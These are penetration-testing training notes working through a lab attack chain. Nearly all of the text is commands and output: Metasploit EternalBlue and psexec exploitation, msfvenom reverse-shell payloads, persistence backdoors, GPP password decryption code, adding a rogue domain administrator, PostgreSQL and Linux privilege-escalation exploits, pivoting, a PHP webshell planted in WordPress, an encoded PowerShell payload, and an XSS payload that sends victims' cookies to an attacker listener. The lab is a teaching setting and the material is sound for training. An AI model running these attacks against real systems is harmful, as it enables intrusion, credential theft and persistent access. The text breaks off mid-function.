
Security Training Notes

Metasploit: Windows targets


# msfdb start

# msfconsole


> use auxiliary/scanner/portscan/tcp

> set RHOSTS 192.168.56.105 192.168.56.100

> run


[+] 192.168.56.105:       - 192.168.56.105:25 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:21 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:80 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:81 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:110 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:139 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:135 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:445 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:443 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:587 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:995 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:3306 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:3389 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:4433 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:5357 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:5985 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:7777 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:8009 - TCP OPEN

[+] 192.168.56.105:       - 192.168.56.105:8080 - TCP OPEN

[*] Scanned 1 of 2 hosts (50% complete)

[+] 192.168.56.100:       - 192.168.56.100:53 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:88 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:139 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:135 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:389 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:445 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:464 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:593 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:636 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:3269 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:3268 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:3389 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:5722 - TCP OPEN

[+] 192.168.56.100:       - 192.168.56.100:9389 - TCP OPEN

[*] Scanned 2 of 2 hosts (100% complete)

[*] Auxiliary module execution completed
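Before moving on it is worth reading the two port lists for role: 53, 88, 389, 464, 636, 3268, 3269 and 9389 open together are the signature of an Active Directory domain controller, which is what the smb_version step below confirms for DC-SVR, while 445/3389/5985 on either host are the remote-admin entry points used later. The Python below is an added example (not part of the original notes and not Metasploit code) that parses the portscan/tcp console format shown above and flags the likely DC; SAMPLE is a constructed subset of the lines above.

```python
import re
from collections import defaultdict

# Constructed subset of the auxiliary/scanner/portscan/tcp output shown above.
SAMPLE = """\
[+] 192.168.56.105:       - 192.168.56.105:21 - TCP OPEN
[+] 192.168.56.105:       - 192.168.56.105:80 - TCP OPEN
[+] 192.168.56.105:       - 192.168.56.105:135 - TCP OPEN
[+] 192.168.56.105:       - 192.168.56.105:139 - TCP OPEN
[+] 192.168.56.105:       - 192.168.56.105:445 - TCP OPEN
[+] 192.168.56.105:       - 192.168.56.105:3389 - TCP OPEN
[+] 192.168.56.105:       - 192.168.56.105:5985 - TCP OPEN
[+] 192.168.56.105:       - 192.168.56.105:8080 - TCP OPEN
[*] Scanned 1 of 2 hosts (50% complete)
[+] 192.168.56.100:       - 192.168.56.100:53 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:88 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:135 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:139 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:389 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:445 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:464 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:636 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:3268 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:3269 - TCP OPEN
[+] 192.168.56.100:       - 192.168.56.100:9389 - TCP OPEN
[*] Scanned 2 of 2 hosts (100% complete)
"""

# One open-port line looks like "[+] <host>:   - <host>:<port> - TCP OPEN".
OPEN_LINE = re.compile(
    r"^\[\+\]\s+(\d{1,3}(?:\.\d{1,3}){3}):\s+-\s+\S+?:(\d+)\s+-\s+TCP OPEN"
)

# Ports that together identify an AD domain controller; Kerberos + LDAP is the decisive pair.
DC_PORTS = {53: "DNS", 88: "Kerberos", 389: "LDAP", 464: "kpasswd", 636: "LDAPS",
            3268: "Global Catalog", 3269: "Global Catalog SSL", 9389: "ADWS"}
# Remote-administration surfaces worth noting on any Windows host.
ADMIN_PORTS = {445: "SMB", 3389: "RDP", 5985: "WinRM"}


def parse_portscan(text):
    """Return {host: sorted list of open TCP ports} from portscan/tcp console output."""
    hosts = defaultdict(set)
    for line in text.splitlines():
        m = OPEN_LINE.match(line)
        if m:
            hosts[m.group(1)].add(int(m.group(2)))
    return {host: sorted(ports) for host, ports in hosts.items()}


def classify_host(ports):
    """Return (likely_dc, dc_services, admin_services) for one host's open ports."""
    dc = {p: DC_PORTS[p] for p in ports if p in DC_PORTS}
    admin = {p: ADMIN_PORTS[p] for p in ports if p in ADMIN_PORTS}
    likely_dc = 88 in dc and 389 in dc
    return likely_dc, dc, admin


if __name__ == "__main__":
    for host, ports in parse_portscan(SAMPLE).items():
        likely_dc, dc, admin = classify_host(ports)
        role = "likely DOMAIN CONTROLLER" if likely_dc else "member host"
        print(f"{host}: {len(ports)} open, {role}; AD ports {sorted(dc)}, admin ports {sorted(admin)}")
```

Run against the full console output (or `services -o` exported from the database) the same parser gives the host list to prioritise: the DC is the target of the psexec step later, the member host with WinRM/RDP is the foothold.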



> use auxiliary/scanner/smb/smb_version

> set RHOSTS 192.168.56.105 192.168.56.100

> run


[+] 192.168.56.105:445    - Host is running Windows 7 Enterprise SP1 (build:7601) (name:KEUANGAN-PC) (domain:MEGACORP) (signatures:optional)

[*] Scanned 1 of 2 hosts (50% complete)

[+] 192.168.56.100:445    - Host is running Windows 2008 R2 Datacenter SP1 (build:7601) (name:DC-SVR) (domain:MEGACORP) (signatures:required)

[*] Scanned 2 of 2 hosts (100% complete)

[*] Auxiliary module execution completed


> services -p 445

Services

========


host            port  proto  name  state  info

----            ----  -----  ----  -----  ----

192.168.56.100  445   tcp    smb   open   Windows 2008 R2 Datacenter SP1 (build:7601) (name:DC-SVR) (domain:MEGACORP) (signatures:required)

192.168.56.105  445   tcp    smb   open   Windows 7 Enterprise SP1 (build:7601) (name:KEUANGAN-PC) (domain:MEGACORP) (signatures:optional)


> use auxiliary/scanner/smb/smb_ms17_010 

> set RHOSTS 192.168.56.105 192.168.56.100

> run


[+] 192.168.56.105:445    - Host is likely VULNERABLE to MS17-010! - Windows 7 Enterprise 7601 Service Pack 1 x64 (64-bit)

[*] Scanned 1 of 2 hosts (50% complete)

[+] 192.168.56.100:445    - Host is likely VULNERABLE to MS17-010! - Windows Server 2008 R2 Datacenter 7601 Service Pack 1 x64 (64-bit)

[*] Scanned 2 of 2 hosts (100% complete)

[*] Auxiliary module execution completed


> use exploit/windows/smb/ms17_010_eternalblue

> set RHOSTS 192.168.56.105

> set payload windows/x64/meterpreter/reverse_https

> set LHOST 192.168.56.4

> exploit


$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=8080 -f exe -o winbox.exe 


> use exploit/multi/handler

> set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.56.4

> set LPORT 8080

> run


$ python -m SimpleHTTPServer 8069   (Python 2; on a current Kali use: python3 -m http.server 8069)


### Download winbox.exe from the attacker's HTTP server (port 8069) and run it on the client


> sessions


Active sessions

===============


  Id  Name  Type                     Information                    Connection

  --  ----  ----                     -----------                    ----------

  2         meterpreter x86/windows  MEGACORP\rhooke @ KEUANGAN-PC  192.168.56.4:8080 -> 192.168.56.105:49424 (192.168.56.105)



> sessions 2

meterpreter > getpid

Current pid: 5036

meterpreter > sysinfo

Computer        : KEUANGAN-PC

OS              : Windows 7 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : id_ID

Domain          : MEGACORP

Logged On Users : 3

Meterpreter     : x86/windows


# locate PowerView.ps1

/usr/lib/python3/dist-packages/cme/data/powersploit/Recon/PowerView.ps1

/usr/share/windows-resources/powersploit/Recon/PowerView.ps1


meterpreter > load powershell


meterpreter > powershell_import /usr/share/windows-resources/powersploit/Recon/PowerView.ps1


### Create a Persistence Backdoor


meterpreter > run persistence -X -U -r 192.168.56.4 -p 4444

(-X starts the agent at boot, -U at user logon, -r/-p are the callback host and port. `persistence` is the legacy Meterpreter script; current Metasploit versions replace it with exploit/windows/local/persistence and post/windows/manage/persistence_exe.)

meterpreter > background

Back in exploit/multi/handler, listen on the persistence port: -j runs the handler as a job, jobs -K kills the jobs, and the foreground exploit then catches the callback after a reboot or logon.

> set LPORT 4444

> exploit -j

> jobs -K

> exploit


> sessions


Active sessions

===============


  Id  Name  Type                     Information                    Connection

  --  ----  ----                     -----------                    ----------

  4         meterpreter x86/windows  MEGACORP\rhooke @ KEUANGAN-PC  192.168.56.4:4444 -> 192.168.56.105:49185 (192.168.56.105)


  

### Privilege Escalation on Windows Server 2008 via Group Policy Preferences Passwords


meterpreter > run post/windows/gather/credentials/gpp


[+] [2020.08.04-00:46:24]  Group Policy Credential Info

============================


 Name               Value

 ----               -----

 TYPE               Groups.xml

 USERNAME           svc_adm

 PASSWORD           j4K4R741572!

 DOMAIN CONTROLLER  DC-SVR

 DOMAIN             megacorp.local

 CHANGED            2020-07-19 12:06:11

 NEVER_EXPIRES?     1

 DISABLED           0

 NAME               Default Domain Policy


meterpreter > shell

C:\Windows\system32>net user svc_adm

net user svc_adm

User name                    svc_adm

Full Name                    

Comment                      

User's comment               

Country code                 000 (System Default)

Account active               Yes

Account expires              Never


Password last set            04/08/2020 11:39:32

Password expires             Never

Password changeable          05/08/2020 11:39:32

Password required            Yes

User may change password     Yes


Workstations allowed         All

Logon script                 

User profile                 

Home directory               

Last logon                   Never


Logon hours allowed          All


Local Group Memberships      

Global Group memberships     *None                 

The command completed successfully.
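Why this works, as an added example (not from the original notes and not the Metasploit module's code): Groups.xml lives in SYSVOL, which every authenticated domain user can read, and its cpassword attribute is AES-256-CBC encrypted with a key Microsoft published in the MS-GPPREF documentation, so a low-privilege session like rhooke's is enough to recover a domain account's password. The Python below parses such a file and decrypts the value. The XML is a constructed sample in the layout GPP writes under `\\<domain>\SYSVOL\<domain>\Policies\{GUID}\Machine\Preferences\Groups\`; the cpassword in it is the documentation example shipped with the gpp-decrypt tool, not the svc_adm value found above. Decryption needs the `cryptography` package.

```python
import base64
import xml.etree.ElementTree as ET

# AES-256 key Microsoft published for GPP cpassword (MS-GPPREF, "Password Encryption").
# It is public, so cpassword is obfuscation, not protection; MS14-025 / KB2962486 removed the feature.
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# Constructed Groups.xml; the cpassword is gpp-decrypt's documentation sample, not this lab's value.
SAMPLE_GROUPS_XML = """<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="svc_adm" image="2"
        changed="2020-07-19 12:06:11" uid="{00000000-0000-0000-0000-000000000001}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="svc_adm"/>
  </User>
</Groups>
"""


def fix_base64_padding(value):
    """GPP strips the trailing '=' from the base64 text; restore it before decoding."""
    return value + "=" * (-len(value) % 4)


def decrypt_cpassword(cpassword):
    """AES-256-CBC with an all-zero IV, PKCS#7 padding, UTF-16LE plaintext."""
    from cryptography.hazmat.primitives import padding
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    data = base64.b64decode(fix_base64_padding(cpassword))
    decryptor = Cipher(algorithms.AES(GPP_AES_KEY), modes.CBC(bytes(16))).decryptor()
    padded = decryptor.update(data) + decryptor.finalize()
    unpadder = padding.PKCS7(128).unpadder()
    return (unpadder.update(padded) + unpadder.finalize()).decode("utf-16-le")


def find_cpasswords(xml_text):
    """Return [(account, cpassword)] for every Properties element that carries a cpassword.

    The account attribute differs per preference type: userName (Groups.xml, Drives.xml),
    accountName (Services.xml), runAs (ScheduledTasks.xml).
    """
    found = []
    for props in ET.fromstring(xml_text).iter("Properties"):
        cp = props.get("cpassword")
        if cp:
            account = props.get("userName") or props.get("accountName") or props.get("runAs") or "?"
            found.append((account, cp))
    return found


if __name__ == "__main__":
    for account, cp in find_cpasswords(SAMPLE_GROUPS_XML):
        print(f"{account}: {decrypt_cpassword(cp)}")
```

On the defensive side the fix is not a stronger key: install KB2962486 (MS14-025) on the administration hosts so GPP can no longer store passwords, delete every Groups.xml, Services.xml, ScheduledTasks.xml and similar file in SYSVOL that still carries a cpassword, and rotate the accounts they named.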


### Attack the domain controller


meterpreter > background


> use exploit/windows/smb/psexec

> set payload windows/meterpreter/reverse_tcp

> set LHOST 192.168.56.4

> set LPORT 4444

> set RHOSTS 192.168.56.100

> set SMBUSER svc_adm

> set SMBPASS j4K4R741572!

> exploit



[*] [2020.08.04-00:53:38] Started reverse TCP handler on 192.168.56.4:4444 

[*] [2020.08.04-00:53:38] 192.168.56.100:445 - Connecting to the server...

[*] [2020.08.04-00:53:38] 192.168.56.100:445 - Authenticating to 192.168.56.100:445 as user 'svc_adm'...

[*] [2020.08.04-00:53:39] 192.168.56.100:445 - Selecting PowerShell target

[*] [2020.08.04-00:53:39] 192.168.56.100:445 - Executing the payload...

[+] [2020.08.04-00:53:43] 192.168.56.100:445 - Service start timed out, OK if running a command or non-service executable...

[*] [2020.08.04-00:53:55] Encoded stage with x86/shikata_ga_nai

[*] [2020.08.04-00:53:55] Sending encoded stage (176224 bytes) to 192.168.56.100

[*] Meterpreter session 5 opened (192.168.56.4:4444 -> 192.168.56.100:49347) at 2020-08-04 00:53:56 -0400


meterpreter > sysinfo

Computer        : DC-SVR

OS              : Windows 2008 R2 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : id_ID

Domain          : MEGACORP

Logged On Users : 1

Meterpreter     : x86/windows


meterpreter > shell

C:\Windows\system32>net user aceng Anjay123! /add /domain

C:\Windows\system32>net localgroup Administrators aceng /add /domain

# rdesktop -d megacorp -u aceng -p Anjay123! 192.168.56.100

 


### Vulnerability Assessment

Notes are in the folder catatan/vunerability-assesment

A vulnerability assessment is: when we find a vulnerability we test it or build a proof of concept for the finding,
then document the impact that the vulnerability would have.

 

 

### Pentesting the VA findings with Metasploit

 

msf5 > workspace -a nessus_pentest

[*] Added workspace: nessus_pentest                                                                                                                                   

[*] Workspace: nessus_pentest 


msf5 > db_import /home/kali/Downloads/Training_Nessus_ylvmgg.nessus

[*] Importing 'Nessus XML (v2)' data

[*] Importing host 192.168.56.120

[*] Importing host 192.168.56.105

[*] Importing host 192.168.56.100

[*] Importing host 192.168.56.2

[*] Importing host 10.14.3.234

[*] Successfully imported /home/kali/Downloads/Training_Nessus_ylvmgg.nessus


msf5 > vulns


Install the Metasploit plugins (copy the .rb files from the cloned repo into ~/.msf4/plugins/ so that `load pentest` can find them):


git clone https://github.com/darkoperator/Metasploit-Plugins.git


msf5 > load pentest

msf5 > setg LHOST 192.168.56.4


msf5 > vuln_exploit 

[*] Generating List for Matching...

[*] Matching Exploits (This will take a while depending on number of hosts)...

[-] No Exploits where Matched.



git clone https://github.com/DanMcInerney/msf-autopwn.git --recursive

cd msf-autopwn/                                                                                      

sudo apt install pipenv 


### Credentialed Patch Audit - scanning with credentials



### Pentesting PostgreSQL


msf5 > use auxiliary/scanner/postgres/postgres_login 

msf5 auxiliary(scanner/postgres/postgres_login) > set RHOSTS 192.168.56.120

msf5 auxiliary(scanner/postgres/postgres_login) > run

[+] 192.168.56.120:5432 - Login Successful: postgres:postgres@template1


msf5 auxiliary(scanner/postgres/postgres_login) > use auxiliary/admin/postgres/postgres_readfile 

msf5 auxiliary(admin/postgres/postgres_readfile) > set RHOSTS 192.168.56.120

msf5 auxiliary(admin/postgres/postgres_readfile) > use auxiliary/scanner/postgres/postgres_hashdump 

msf5 auxiliary(scanner/postgres/postgres_hashdump) > set RHOSTS 192.168.56.120

msf5 auxiliary(scanner/postgres/postgres_hashdump) > run



msf5 auxiliary(scanner/postgres/postgres_hashdump) > use auxiliary/admin/postgres/postgres_sql

msf5 auxiliary(admin/postgres/postgres_sql) > set RHOSTS 192.168.56.120

RHOSTS => 192.168.56.120

msf5 auxiliary(admin/postgres/postgres_sql) > show options 


Module options (auxiliary/admin/postgres/postgres_sql):


   Name           Current Setting   Required  Description

   ----           ---------------   --------  -----------

   DATABASE       template1         yes       The database to authenticate against

   PASSWORD       postgres          no        The password for the specified username. Leave blank for a random password.

   RETURN_ROWSET  true              no        Set to true to see query result sets

   RHOSTS                           yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'

   RPORT          5432              yes       The target port

   SQL            select version()  no        The SQL query to execute

   USERNAME       postgres          yes       The username to authenticate as

   VERBOSE        false             no        Enable verbose output


   


msf5 auxiliary(admin/postgres/postgres_sql) > run

[*] Running module against 192.168.56.120


Query Text: 'select version()'

==============================


    version

    -------

    PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)


[*] Auxiliary module execution completed



msf5 auxiliary(admin/postgres/postgres_sql) > use exploit/linux/postgres/postgres_payload 

msf5 exploit(linux/postgres/postgres_payload) > set payload linux/x86/meterpreter/reverse_tcp

msf5 exploit(linux/postgres/postgres_payload) > set RHOSTS 192.168.56.120

msf5 exploit(linux/postgres/postgres_payload) > set LPORT 8080

msf5 exploit(linux/postgres/postgres_payload) > exploit 


[*] Started reverse TCP handler on 192.168.56.4:8080 

[*] 192.168.56.120:5432 - PostgreSQL 8.3.1 on i486-pc-linux-gnu, compiled by GCC cc (GCC) 4.2.3 (Ubuntu 4.2.3-2ubuntu4)

[*] Uploaded as /tmp/oVSLcTrl.so, should be cleaned up automatically

[*] Sending stage (980808 bytes) to 192.168.56.120

[*] Meterpreter session 1 opened (192.168.56.4:8080 -> 192.168.56.120:51579) at 2020-08-05 02:35:45 -0400


meterpreter > 


meterpreter > sysinfo

Computer     : metasploitable.localdomain

OS           : Ubuntu 8.04 (Linux 2.6.24-16-server)

Architecture : i686

BuildTuple   : i486-linux-musl

Meterpreter  : x86/linux


meterpreter > shell

Process 6348 created.

Channel 2 created.


uname -a

Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux


[ctrl + c]

meterpreter > background 


msf5 exploit(linux/postgres/postgres_payload) > use exploit/linux/local/udev_netlink 

msf5 exploit(linux/local/udev_netlink) > sessions


Active sessions

===============


  Id  Name  Type                   Information                                                                       Connection

  --  ----  ----                   -----------                                                                       ----------

  1         meterpreter x86/linux  no-user @ metasploitable (uid=108, gid=117, euid=108, egid=117) @ metasploita...  192.168.56.4:8080 -> 192.168.56.120:49379 (192.168.56.120)

msf5 exploit(linux/local/udev_netlink) > set payload linux/x86/meterpreter/reverse_tcp

msf5 exploit(linux/local/udev_netlink) > set session 1


msf5 exploit(linux/local/udev_netlink) > set LHOST 192.168.56.4

LHOST => 192.168.56.4

msf5 exploit(linux/local/udev_netlink) > set LPORT 8080

LPORT => 8080

msf5 exploit(linux/local/udev_netlink) > exploit 


[*] Started reverse TCP handler on 192.168.56.4:8080 

[*] Attempting to autodetect netlink pid...

[*] Meterpreter session, using get_processes to find netlink pid

[*] udev pid: 2361

[+] Found netlink pid: 2360

[*] Writing payload executable (207 bytes) to /tmp/okdriNosTv

[*] Writing exploit executable (1879 bytes) to /tmp/rrmpTfgUdR

[*] chmod'ing and running it...

[*] Sending stage (980808 bytes) to 192.168.56.120

[*] Meterpreter session 2 opened (192.168.56.4:8080 -> 192.168.56.120:53184) at 2020-08-05 02:50:22 -0400


meterpreter > 

meterpreter > shell

Process 6391 created.

Channel 1 created.

whoami

firefart

/bin/bash -i

bash: no job control in this shell

firefart@metasploitable:/# 



### Attacking through a tunnel

Attack the Metasploitable2 VM by pivoting through the compromised Windows host


$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=8080 -f exe -o notepad.exe  


msf5 exploit(linux/local/udev_netlink) > use exploit/multi/handler 

msf5 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.56.4

LHOST => 192.168.56.4

msf5 exploit(multi/handler) > set LPORT 8080

LPORT => 8080

msf5 exploit(multi/handler) > exploit -j

[*] Exploit running as background job 0.

[*] Exploit completed, but no session was created.

[*] Started reverse TCP handler on  192.168.56.4:8080



meterpreter > portfwd add -l 8085 -p 80 -r 192.168.56.4

(as typed this relays to port 80 on 192.168.56.4, the attacker machine itself; to reach the Metasploitable web server through the pivot the remote host is 192.168.56.120, as in the SSH forward below)

meterpreter > portfwd list


Active Port Forwards

====================


   Index  Local         Remote           Direction

   -----  -----         ------           ---------

   1      0.0.0.0:8085  192.168.56.4:80  Forward


1 total active port forwards.


meterpreter > portfwd add -l 8086 -p 22 -r 192.168.56.120

[*] Local TCP relay created: :8086 <-> 192.168.56.120:22


$ ssh -p 8086 msfadmin@127.0.0.1


## With dynamic port forwarding (SOCKS proxy through the session)


msf5 exploit(multi/handler) > use auxiliary/server/socks4a 

msf5 auxiliary(server/socks4a) > set SRVPORT 9050

SRVPORT => 9050

msf5 auxiliary(server/socks4a) > route add 192.168.56.0/24 3

[*] Route already exists

msf5 auxiliary(server/socks4a) > route 


IPv4 Active Routing Table

=========================


   Subnet             Netmask            Gateway

   ------             -------            -------

   192.168.56.0       255.255.255.0      Session 3


[*] There are currently no IPv6 routes defined.

msf5 auxiliary(server/socks4a) > 


msf5 auxiliary(server/socks4a) > run


$ proxychains curl 192.168.56.120                                                                                                                                   

ProxyChains-3.1 (http://proxychains.sf.net)                                                                                                                           

|S-chain|-<>-127.0.0.1:9050-<><>-192.168.56.120:80-                                                                                                                   

<><>-OK                                                                                                                                                               

<html><head><title>Metasploitable2 - Linux</title></head><body>                                                                                                       

<pre>                                                                                                                                                                 

                                                                                                                                                                      

                _                  _       _ _        _     _      ____                                                                                               

 _ __ ___   ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \                                                                                              

| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |                                                                                             

| | | | | |  __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | |  __// __/                                                                                              

|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|                                                                                             

                            |_|                                                                                                                                       

                                                                                                                                                                      

                                                                                                                                                                      

Warning: Never expose this VM to an untrusted network!                                                                                                                

                                                                                                                                                                      

Contact: msfdev[at]metasploit.com                                                                                                                                     

                                                                                                                                                                      

Login with msfadmin/msfadmin to get started                                                                                                                           

                                                                                                                                                                      

                                                                                                                                                                      

</pre>                                                                                                                                                                

<ul>                                                                                                                                                                  

<li><a href="/twiki/">TWiki</a></li>                                                                                                                                  

<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>                                                                                                                        

<li><a href="/mutillidae/">Mutillidae</a></li>                                                                                                                        

<li><a href="/dvwa/">DVWA</a></li>                                                                                                                                    

<li><a href="/dav/">WebDAV</a></li>                                                                                                                                   

</ul>                                                                                                                                                                 

</body>                                                                                                                                                               

</html>          


### Web Application Attacks


#### Pentesting WordPress

$ dirb http://192.168.56.105/

$ whatweb http://192.168.56.105/wordpress/ 

/usr/lib/ruby/vendor_ruby/target.rb:188: warning: URI.escape is obsolete

http://192.168.56.105/wordpress/ [200 OK] Apache[2.4.41], Country[RESERVED][ZZ], HTML5, HTTPServer[Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.3], IP[192.168.56.105], JQuery[1.12.4], MetaGenerator[WordPress 4.9.8], OpenSSL[1.1.1c], PHP[7.4.3][C:\xampp\htdocs\wordpress\wp-includes\pomo\plural-forms.php], Script[text/javascript], Title[MegaCorp Website], UncommonHeaders[link], WordPress[4.9.8], X-Powered-By[PHP/7.4.3]


$ wpscan --url http://192.168.56.105/wordpress -e vp

$ wpscan --url http://192.168.56.105/wordpress -e u1-5

$ wpscan --url http://192.168.56.105/wordpress --usernames admin --passwords /usr/share/wordlists/rockyou.txt

[!] Valid Combinations Found:

 | Username: admin, Password: monkey123


$ git clone https://github.com/b374k/b374k.git

$ cd b374k 

$ php index.php -p Anjay123! -o shell.php -s -b -z gzcompress -c 9                                                                      

b374k shell packer 0.4.2                                                                                                                  

                                                                                                                                          

Filename                : shell.php                                                                                                       

Password                : Anjay123!                                                                                                       

Theme                   : default                                                                                                         

Modules                 : convert,database,info,mail,network,processes                                                                    

Strip                   : yes                                                                                                             

Base64                  : yes                                                                                                             

Compression             : gzcompress                                                                                                      

Compression level       : 9                                                                                                               

Result                  : Succeeded : [ shell.php ] Filesize : 111695


$ gedit shell.php   (copy the whole contents of the file)


Log in to the WordPress admin -> Appearance -> Editor -> open the 404 template -> replace it with the contents of shell.php


Open http://192.168.56.105/wordpress/ngasal (any non-existent path renders the 404 template)

Enter the password Anjay123!


With a minimal backdoor instead:

Log in to the WordPress admin -> Appearance -> Editor -> open the 404 template -> paste the following shell


```

<?php

echo "<pre>";

system($_GET['cmd']);

echo "</pre>";

?>

```

Open in the browser:

http://192.168.56.105/wordpress/aa?cmd=whoami


msf5 > handler -H 192.168.56.4 -P 6988 -p windows/meterpreter/reverse_tcp


$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.56.4 LPORT=6988 -f psh-cmd


/usr/share/metasploit-framework/vendor/bundle/ruby/2.7.0/gems/activerecord-4.2.11.1/lib/active_record/connection_adapters/abstract_adapter.rb:84: warning: deprecated Object#=~ is called on Integer; it always returns nil                                                         

[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload                                                    

[-] No arch selected, selecting arch: x86 from the payload                                                                                

No encoder or badchars specified, outputting raw payload                                                                                  

Payload size: 341 bytes                                                                                                                   

Final size of psh-cmd file: 6319 bytes                                                                                                    

%COMSPEC% /b /c start /b /min powershell.exe -nop -w hidden -e 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     


Copy from powershell.exe to the end of the line and pass it as the backdoor's cmd parameter (URL-encoded):


Open in the browser:

http://192.168.56.105/wordpress/aa?cmd=powershell.exe%20-nop%20-w%20hidden%20-e%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


Back in Metasploit the session arrives on the handler:

msf5 > sessions


Active sessions

===============


  Id  Name  Type                     Information                        Connection

  --  ----  ----                     -----------                        ----------

  1         meterpreter x86/windows  NT AUTHORITY\SYSTEM @ KEUANGAN-PC  192.168.56.4:6988 -> 192.168.56.105:53925 (192.168.56.105)


msf5 > sessions 1

[*] Starting interaction with 1...


meterpreter > sysinfo

Computer        : KEUANGAN-PC

OS              : Windows 7 (6.1 Build 7601, Service Pack 1).

Architecture    : x64

System Language : id_ID

Domain          : MEGACORP

Logged On Users : 3

Meterpreter     : x86/windows

meterpreter > 



#### XSS (Cross-Site Scripting)

##### Reflected XSS

 

1. Trigger a popup

In an input field, enter:

<script>alert("XSS")</script>

If a popup appears, the field is vulnerable to XSS.

2. Show the session cookie (document.cookie only returns cookies without the HttpOnly flag):

<script>alert(document.cookie);</script>

3. Steal the cookie (redirect the victim to a listener that records document.cookie)

 

 $ nc -lnvp 8080

 

Enter in the input field:

 

 <script>document.location="http://192.168.56.4:8080/steal?cookie=" + document.cookie</script>

 

nc will show:

 

 connect to [192.168.56.4] from (UNKNOWN) [192.168.56.4] 53426

GET /steal?cookie=security=low;%20PHPSESSID=ffad61013553290517fa82bb9ae63be1 HTTP/1.1

Host: 192.168.56.4:8080

User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0

Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8

Accept-Language: en-US,en;q=0.5

Accept-Encoding: gzip, deflate

Referer: http://192.168.56.120/dvwa/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%22http%3A%2F%2F192.168.56.4%3A8080%2Fsteal%3Fcookie%3D%22+%2B+document.cookie%3C%2Fscript%3E

Connection: keep-alive

Upgrade-Insecure-Requests: 1


Open an incognito window

Go to http://192.168.56.120/dvwa/login.php

In the developer tools (Storage / Cookies) set PHPSESSID=ffad61013553290517fa82bb9ae63be1 and security=low

Reload the page

Open: http://192.168.56.120/dvwa/vulnerabilities/xss_r/ (the hijacked session is logged in as the victim)
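The nc listener above only shows the raw request; the following Python is an added example (not part of the original notes) of a small cookie catcher that parses the `/steal?cookie=` request the payload sends, records victim address, Referer and cookies, and builds the Cookie header to replay the session. The request path in the test is the one captured above; the server, port 8080 and the `/steal` path are the values used in the payload.

```python
import http.server
import urllib.parse


def parse_stolen_cookie(path):
    """Turn '/steal?cookie=security=low;%20PHPSESSID=abc' into {'security': 'low', 'PHPSESSID': 'abc'}.

    The query is decoded by hand rather than with parse_qs, because parse_qs in older
    Python versions splits on ';' and would cut the cookie string in half.
    """
    query = urllib.parse.urlsplit(path).query
    if not query.startswith("cookie="):
        return {}
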